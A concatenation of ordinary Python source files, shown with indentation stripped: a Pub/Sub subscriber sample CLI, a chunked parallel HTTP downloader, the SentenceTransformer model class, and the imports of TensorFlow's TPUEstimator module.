# TODO subscription_name = "Your Pubsub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
future = subscriber.subscribe(subscription_path, callback=callback)
# Blocks the thread while messages are coming in through the stream. Any
# exceptions that crop up on the thread will be set on the future.
try:
# When timeout is unspecified, the result method waits indefinitely.
future.result(timeout=30)
except Exception as e:
print(
'Listening for messages on {} threw an Exception: {}.'.format(
subscription_name, e))
# [END pubsub_subscriber_error_listener]
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('project_id', help='Your Google Cloud project ID')
subparsers = parser.add_subparsers(dest='command')
list_in_topic_parser = subparsers.add_parser(
'list_in_topic', help=list_subscriptions_in_topic.__doc__)
list_in_topic_parser.add_argument('topic_name')
list_in_project_parser = subparsers.add_parser(
'list_in_project', help=list_subscriptions_in_project.__doc__)
create_parser = subparsers.add_parser(
'create', help=create_subscription.__doc__)
create_parser.add_argument('topic_name')
create_parser.add_argument('subscription_name')
create_push_parser = subparsers.add_parser(
'create-push', help=create_push_subscription.__doc__)
create_push_parser.add_argument('topic_name')
create_push_parser.add_argument('subscription_name')
create_push_parser.add_argument('endpoint')
delete_parser = subparsers.add_parser(
'delete', help=delete_subscription.__doc__)
delete_parser.add_argument('subscription_name')
update_parser = subparsers.add_parser(
'update', help=update_subscription.__doc__)
update_parser.add_argument('subscription_name')
update_parser.add_argument('endpoint')
receive_parser = subparsers.add_parser(
'receive', help=receive_messages.__doc__)
receive_parser.add_argument('subscription_name')
receive_with_custom_attributes_parser = subparsers.add_parser(
'receive-custom-attributes',
help=receive_messages_with_custom_attributes.__doc__)
receive_with_custom_attributes_parser.add_argument('subscription_name')
receive_with_flow_control_parser = subparsers.add_parser(
'receive-flow-control',
help=receive_messages_with_flow_control.__doc__)
receive_with_flow_control_parser.add_argument('subscription_name')
synchronous_pull_parser = subparsers.add_parser(
'receive-synchronously',
help=synchronous_pull.__doc__)
synchronous_pull_parser.add_argument('subscription_name')
synchronous_pull_with_lease_management_parser = subparsers.add_parser(
'receive-synchronously-with-lease',
help=synchronous_pull_with_lease_management.__doc__)
synchronous_pull_with_lease_management_parser.add_argument(
'subscription_name')
listen_for_errors_parser = subparsers.add_parser(
'listen_for_errors', help=listen_for_errors.__doc__)
listen_for_errors_parser.add_argument('subscription_name')
args = parser.parse_args()
if args.command == 'list_in_topic':
list_subscriptions_in_topic(args.project_id, args.topic_name)
elif args.command == 'list_in_project':
list_subscriptions_in_project(args.project_id)
elif args.command == 'create':
create_subscription(
args.project_id, args.topic_name, args.subscription_name)
elif args.command == 'create-push':
create_push_subscription(
args.project_id,
args.topic_name,
args.subscription_name,
args.endpoint)
elif args.command == 'delete':
delete_subscription(
args.project_id, args.subscription_name)
elif args.command == 'update':
update_subscription(
args.project_id, args.subscription_name, args.endpoint)
elif args.command == 'receive':
receive_messages(args.project_id, args.subscription_name)
elif args.command == 'receive-custom-attributes':
receive_messages_with_custom_attributes(
args.project_id, args.subscription_name)
elif args.command == 'receive-flow-control':
receive_messages_with_flow_control(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously':
synchronous_pull(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously-with-lease':
synchronous_pull_with_lease_management(
args.project_id, args.subscription_name)
elif args.command == 'listen_for_errors':
listen_for_errors(args.project_id, args.subscription_name)
|
down.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import tempfile
import threading
import time
import warnings
import requests
from .chunk import Chunk
logger = logging.getLogger(__name__)
def readable_bytes(num, suffix='B'):
for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
if abs(num) < 1000.0:
return "{:5.1f} {}{}".format(num, unit, suffix)
num /= 1024.0
return "{:5.1f} {}{}".format(num, 'Yi', suffix)
class Downloader(object):
# States
INIT = 0
DOWNLOADING = 1
PAUSED = 2
MERGING = 3
FINISHED = 4
STOPPED = 5
def __init__(self, url, file_name, chunk_count, high_speed=False, headers=None):
self.url = url
self.file_name = file_name
self.chunk_count = chunk_count
self.high_speed = high_speed
if headers is None:
headers = []
self.headers = {}
for header in headers:
key = header.split(':')[0].strip()
value = header.split(':')[1].strip()
self.headers[key] = value
self.total_length = 0
self.total_downloaded = 0
self.total_merged = 0
self.__chunks = []
self.last_total = 0
self.speed = 0
self.readable_speed = readable_bytes(self.speed)
self.__state = Downloader.INIT
self.__subs = []
self.__progress_lock = threading.Lock()
self.__async = True
self.thread = threading.Thread(target=self.run)
# This function registers a callback.
# sub_callable: must take at least one argument. (Downloader)
# rate: defines the amount of kilobytes that should be downloaded in
# a second at least to fire an update for subscriber.
def subscribe(self, sub_callable, rate=1):
self.__subs.append([sub_callable, rate])
def notify_subs(self, force=False):
if force:
self.total_downloaded = 0
for chunk in self.__chunks:
self.total_downloaded += chunk.progress
self.speed = self.total_downloaded - self.last_total
self.readable_speed = readable_bytes(self.speed)
self.last_total = self.total_downloaded
for sub in self.__subs:
if self.speed > (sub[1] * 1024) or force:
sub[0](self)
def get_state(self):
return self.__state
def speed_func(self):
while self.__state != Downloader.STOPPED and self.__state != Downloader.MERGING:
self.total_downloaded = 0
for chunk in self.__chunks:
self.total_downloaded += chunk.progress
self.speed = self.total_downloaded - self.last_total
self.readable_speed = readable_bytes(self.speed)
self.last_total = self.total_downloaded
self.notify_subs()
time.sleep(1)
def stop(self):
for chunk in self.__chunks:
chunk.stop()
self.__state = Downloader.STOPPED
def start(self):
if self.__state != Downloader.INIT:
raise RuntimeError('Download has already been started.')
self.thread.start()
def start_sync(self):
if self.__state != Downloader.INIT:
raise RuntimeError('Download has already been started.')
self.run()
def pause(self):
if self.__state == Downloader.INIT:
warnings.warn("Download has not been started yet.")
return
for chunk in self.__chunks:
chunk.pause()
self.__state = Downloader.PAUSED
def resume(self):
if self.__state != Downloader.PAUSED:
warnings.warn("Resume is not applicable at this stage.")
logger.warn("Resume is not applicable at this stage.")
return
for chunk in self.__chunks:
chunk.resume()
self.__state = Downloader.DOWNLOADING
def wait_for_finish(self):
if self.__async:
while self.thread.isAlive():
continue
self.thread.join()
else:
warnings.warn('Downloader was set to run as synchronous. This function will not work')
def run(self):
self.__state = Downloader.DOWNLOADING
r = requests.get(self.url, stream=True, headers=self.headers)
if r.status_code != 200:
raise RuntimeError('Could not connect to given URL')
try:
self.total_length = int(r.headers.get('Content-Length'))
if r.headers.get('Accept-Ranges') != 'bytes':
raise RuntimeError('URL does not support ranged requests.')
except:
self.chunk_count = 0
warnings.warn(
'This url does not support parallel downloading. Normal download will continue.',
RuntimeWarning)
if self.chunk_count == 0:
chunk_file = tempfile.TemporaryFile()
new_chunk = Chunk(self, self.url, file=chunk_file, high_speed=self.high_speed, headers=self.headers)
self.__chunks.append(new_chunk)
new_chunk.start()
else:
chunk_size = self.total_length / self.chunk_count
for chunk_number in range(self.chunk_count):
chunk_file = tempfile.TemporaryFile()
if chunk_number != self.chunk_count - 1:
new_chunk = Chunk(
self, self.url, chunk_file,
start_byte=chunk_number * chunk_size,
end_byte=((chunk_number + 1) * chunk_size) - 1,
number=chunk_number,
high_speed=self.high_speed,
headers=self.headers)
else:
new_chunk = Chunk(
self, self.url, chunk_file,
start_byte=chunk_number * chunk_size,
end_byte=self.total_length - 1,
number=chunk_number,
high_speed=self.high_speed,
headers=self.headers)
self.__chunks.append(new_chunk)
new_chunk.start()
speed_thread = threading.Thread(target=self.speed_func)
speed_thread.start()
for chunk in self.__chunks:
chunk.thread.join()
if self.__state == Downloader.STOPPED:
return
# Forcefully update subscribers for last time.
self.notify_subs(True)
self.__state = Downloader.MERGING
speed_thread.join()
# time to put together all parts
with open(self.file_name, 'wb') as fout:
for chunk in self.__chunks:
# Go to first byte of temporary file
chunk.file.seek(0)
while True:
readbytes = chunk.file.read(1024 * 1024 * 10)
self.total_merged += len(readbytes)
if readbytes:
fout.write(readbytes)
self.notify_subs(force=True)
else:
break
chunk.file.close()
self.__state = Downloader.FINISHED
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
from numpy import ndarray
import transformers
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import tqdm, trange
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .datasets.EncodeDataset import EncodeDataset
from .models import Transformer, Pooling
from . import __version__
class SentenceTransformer(nn.Sequential):
"""
Loads or create a SentenceTransformer model, that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
"""
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logging.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logging.info("Did not find folder {}".format(model_path))
if '\\' in model_path or model_path.count('/') > 1:
raise AttributeError("Path {} not found".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
logging.info("Try to download model from server: {}".format(model_path))
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(
os.getenv('TORCH_HOME', os.path.join(
os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
default_cache_path = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(default_cache_path, folder_name)
os.makedirs(model_path, exist_ok=True)
if not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logging.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
try:
zip_save_path = os.path.join(model_path, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip:
zip.extractall(model_path)
os.remove(zip_save_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path)
if e.response.status_code == 404:
logging.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logging.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logging.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logging.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logging.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encode sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param is_pretokenized: If is_pretokenized=True, sentences must be a list of integers, containing the tokenized sentences with each token convert to the respective int.
:param device: Which torch.device to use for the computation
:param num_workers: Number of background-workers to tokenize data. Set to positive number to increase tokenization speed
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logging.getLogger().getEffectiveLevel()==logging.INFO or logging.getLogger().getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([self._text_length(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
inp_dataset = EncodeDataset(sentences_sorted, model=self, is_tokenized=is_pretokenized)
inp_dataloader = DataLoader(inp_dataset, batch_size=batch_size, collate_fn=self.smart_batching_collate_text_only, num_workers=num_workers, shuffle=False)
iterator = inp_dataloader
if show_progress_bar:
iterator = tqdm(inp_dataloader, desc="Batches")
for features in iterator:
for feature_name in features:
features[feature_name] = features[feature_name].to(device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.cpu().detach().numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None, encode_batch_size: int = 32):
"""
Starts multi process to process the encoding with several, independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:param encode_batch_size: Batch size for each process when calling encode
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logging.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logging.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue, encode_batch_size), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], is_pretokenized: bool = False, chunk_size=None):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param is_pretokenized: If true, no tokenization will be applied. It is expected that the input sentences are list of ints.
:param chunk_size: Sentences are chunked and sent to the individual processes. If none, it determine a sensible size.
:return: Numpy matrix with all embeddings
"""
if chunk_size is None:
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logging.info("Chunk data into packages of size {}".format(chunk_size))
input_queue = pool['input']
last_chunk_id = 0
chunk = []
for sentence in sentences:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([last_chunk_id, is_pretokenized, chunk])
last_chunk_id += 1
chunk = []
if len(chunk) > 0:
input_queue.put([last_chunk_id, is_pretokenized, chunk])
last_chunk_id += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(last_chunk_id)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue, encode_batch_size):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, is_pretokenized, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, is_pretokenized=is_pretokenized, show_progress_bar=False, convert_to_numpy=True, batch_size=encode_batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
return self._last_module().get_sentence_embedding_dimension()
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
logging.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0][0])
labels = []
paired_texts = [[] for _ in range(num_texts)]
max_seq_len = [0] * num_texts
for tokens, label in batch:
labels.append(label)
for i in range(num_texts):
paired_texts[i].append(tokens[i])
max_seq_len[i] = max(max_seq_len[i], self._text_length(tokens[i]))
features = []
for idx in range(num_texts):
max_len = max_seq_len[idx]
feature_lists = {}
for text in paired_texts[idx]:
sentence_features = self.get_sentence_features(text, max_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
features.append(feature_lists)
return {'features': features, 'labels': torch.stack(labels)}
def smart_batching_collate_text_only(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model.
Here, batch is a list of texts
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
max_seq_len = max([self._text_length(text) for text in batch])
feature_lists = {}
for text in batch:
sentence_features = self.get_sentence_features(text, max_seq_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
return feature_lists
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
Help function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if len(text) == 0 or isinstance(text[0], int):
return len(text)
else:
return sum([len(t) for t in text])
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
output_path_ignore_not_empty: bool = False,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param output_path_ignore_not_empty: By default, training will stop if output_path is not empty. If set to true, this error will be ignored and training proceeds.
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
if not output_path_ignore_not_empty and len(os.listdir(output_path)) > 0:
raise ValueError("Output directory ({}) already exists and is not empty.".format(
output_path))
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
#logging.info("Restart data_iterator")
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = batch_to_device(data, self._target_device)
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that is should used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.proto import compilation_result_pb2 as tpu_compilation_result
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.ops import tpu_ordinal_selector_op
from tensorflow.contrib.tpu.python.tpu import _tpu_estimator_embedding
from tensorflow.contrib.tpu.python.tpu import error_handling
from tensorflow.contrib.tpu.python.tpu import functional as tpu_functional
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tensor_tracer
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.tpu.python.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow.contrib.tpu.python.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.export import export_output as export_output_lib
